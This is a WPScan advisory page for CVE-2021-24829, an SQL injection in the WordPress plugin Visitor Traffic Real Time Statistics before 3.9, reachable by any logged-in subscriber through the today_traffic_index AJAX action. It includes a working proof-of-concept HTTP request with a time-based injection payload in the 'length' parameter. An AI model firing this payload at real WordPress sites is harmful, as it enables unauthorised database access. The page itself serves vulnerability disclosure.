WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Visitor Traffic Real Time Statistics < 3.9 - Subscriber+ SQL Injection

Description

The plugin does not validate and escape user input passed to the today_traffic_index AJAX action (available to any authenticated users) before using it in a SQL statement, leading to an SQL injection issue

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Connection: close
Cookie: [subscriber+]

action=today_traffic_index&start=0&length=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(30000000,sha1(1))),0x20),1);

Affects Plugins

visitors-traffic-real-time-statistics
Fixed in version 3.9

References

CVE
CVE-2021-24829

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

JrXnm

Submitter

JrXnm

Submitter website
https://blog.szfszf.top
Verified

Yes

WPVDB ID
cc6585c8-5798-48a1-89f7-a3337f56df3f

Timeline

Publicly Published

2021-10-06 (about 10 months ago)

Added

2021-10-06 (about 10 months ago)

Last Updated

2022-04-12 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin